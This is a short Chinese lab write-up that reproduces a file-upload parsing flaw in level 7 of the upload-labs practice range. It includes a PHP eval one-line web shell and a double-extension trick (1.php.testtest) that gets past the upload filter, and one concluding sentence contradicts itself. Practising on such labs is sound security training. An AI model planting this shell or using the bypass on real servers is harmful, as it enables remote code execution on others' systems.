upload-labs靶场未知后缀名解析漏洞

版本影响：

phpstudy 版本：5.2.17

​

1 环境搭建

1.1 在线靶场下载，解压到phpstudy的www目录下，即可使用

https://github.com/c0ny1/upload-labs

1.2 已启动：访问端口9000，端口自设，打开页面选择第七关

http://192.168.225.194:9000/upload_labs/

2 漏洞复现

2.1 上传1.php文件，文件内容如下,显示上传错误，使用bp上传

<?php @eval($_REQUEST[777]);phpinfo();?>

2.2 使用bp转发

修改php后缀和文件内容类型，进行转发，返回信息提示上传成功

访问不能执行

结论php可以上传，php的不能上传，做了黑白名单策略，验证使用白名单或者是黑名单，随便给个后缀testtest

上传1.php.testtest成功